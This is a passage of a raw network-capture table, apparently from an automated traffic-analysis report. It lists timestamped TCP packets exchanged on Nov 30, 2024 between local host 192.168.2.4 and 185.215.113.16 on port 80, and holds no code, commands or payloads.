                                                      Nov 30, 2024 18:08:41.789025068 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.789303064 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.789344072 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.790693045 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.790739059 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.790843964 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.790888071 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.792339087 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.792381048 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.792634964 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.792682886 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.793867111 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.793914080 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.794187069 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.794231892 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.794837952 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.794883013 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.795298100 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.795342922 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.796058893 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.796104908 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.796112061 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.796154022 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.797837973 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.797852993 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.797888041 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.797907114 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.799854040 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.799869061 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.800013065 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.800796986 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.800811052 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.800856113 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.802264929 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.802315950 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.802398920 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.802444935 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.803855896 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.803899050 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.804231882 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.804276943 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.805927038 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.805937052 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.805969000 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.805998087 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.807132006 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.807178974 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.807342052 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.807389021 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.810826063 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.810874939 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.811012983 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.811058998 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.811875105 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.811918974 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.811985016 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.812032938 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.813685894 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.813736916 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.813838959 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.813886881 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.815135002 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.815176010 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.815869093 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.815913916 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.816073895 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.816083908 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.816114902 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.816133022 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.817310095 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.817325115 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.817354918 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.817373991 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.818803072 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.818845987 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.818969965 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.819014072 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.820847988 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.820858955 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.820904970 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.821922064 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.821976900 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.822413921 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.822460890 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.823637009 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.823683977 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.824002028 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.824047089 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.825808048 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.825819016 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.825861931 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.826865911 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.826911926 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.827394009 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.827438116 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.828557014 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.828600883 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.828860998 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.828902960 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.830539942 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.830550909 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.830588102 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.832091093 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.832103014 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.832143068 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.833441973 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.833488941 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.833980083 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.834027052 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.835113049 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.835156918 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.835486889 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.835531950 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.837996006 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.838006973 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.838044882 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.839613914 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.839660883 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.839756012 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.839804888 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.841515064 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.841552973 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.841577053 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.841619968 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.842962027 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.843008041 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.843276024 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.843333006 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.844778061 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.844829082 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.844934940 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.844980001 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.846394062 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.846405029 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.846441984 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.848042965 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.848053932 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.848084927 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.848109961 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.849812031 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.849872112 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.850269079 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.850311995 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.851721048 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.851758957 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.851861954 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.851895094 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.853275061 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.853322029 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.853456020 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.853499889 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.854866028 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.854908943 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.855043888 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.855091095 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.856528997 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.856574059 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.975523949 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.975586891 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.975702047 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.975748062 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.977097988 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.977109909 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.977142096 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.977159977 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.977984905 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.978033066 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.978188992 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.978234053 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.979672909 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.979715109 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.979835033 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.979880095 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.981729031 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.981739998 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.981777906 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.982948065 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.982991934 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.983134031 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.983185053 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.984613895 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.984658957 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.984774113 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.984837055 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.986262083 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.986309052 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.986443043 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.986490011 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.987845898 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.987890959 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.988039017 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.988086939 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.989510059 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.989552975 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.989785910 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.989830971 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.991324902 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.991369963 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.991393089 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.991439104 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.993083000 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.993140936 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.993326902 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.993371964 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.994440079 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.994489908 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.994652987 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.994693041 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.996342897 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.996354103 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.996397972 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.997725010 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.997770071 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.997924089 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.997963905 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.999083042 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.999150991 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:41.999231100 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:41.999274015 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.000351906 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.000485897 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.000499964 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.000602007 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.001637936 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.001693010 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.001823902 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.001864910 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.002890110 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.002939939 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.003089905 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.003128052 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.004244089 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.004302979 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.004376888 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.004447937 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.005489111 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.005533934 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.005690098 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.005734921 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.006784916 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.006829023 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.007091045 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.007134914 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.008043051 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.008085012 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.008255959 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.008299112 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.009500027 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.009561062 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.009569883 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.009613991 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.010667086 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.010711908 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.010875940 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.010920048 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.011996031 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.012037992 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.012196064 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.012242079 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.013523102 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.013535976 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.013581038 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.014544964 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.014591932 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.014787912 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.014831066 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.015929937 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.015973091 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.016156912 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.016204119 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.017200947 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.017246008 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.017323017 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.017368078 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.018562078 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.018608093 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.018698931 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.018743992 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.019835949 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.019876957 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.019906998 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.019967079 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.021152020 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.021198988 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.021311998 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.021358013 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.022392988 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.022437096 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.022485018 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.022530079 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.023601055 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.023638010 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.023888111 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.023931026 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.024991035 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.025047064 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.025111914 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.025156021 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.026180983 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.026241064 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.026374102 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.026422024 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.027609110 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.027659893 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.027757883 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.027796984 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.028745890 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.028789997 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.028976917 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.029021025 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.030117989 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.030175924 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.030428886 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.030494928 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.031335115 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.031387091 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.031550884 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.031596899 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.032828093 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.032881021 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.032994986 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.033041954 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.033943892 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.033989906 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.034122944 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.034173965 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.035233021 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.035274982 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.035437107 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.035480976 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.036509037 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.036552906 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.036695957 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.036739111 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.037915945 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.037959099 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.037986994 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.038031101 CET4983780192.168.2.4185.215.113.16
                                                      Nov 30, 2024 18:08:42.039072037 CET8049837185.215.113.16192.168.2.4
                                                      Nov 30, 2024 18:08:42.039114952 CET4983780192.168.2.4185.215.113.16
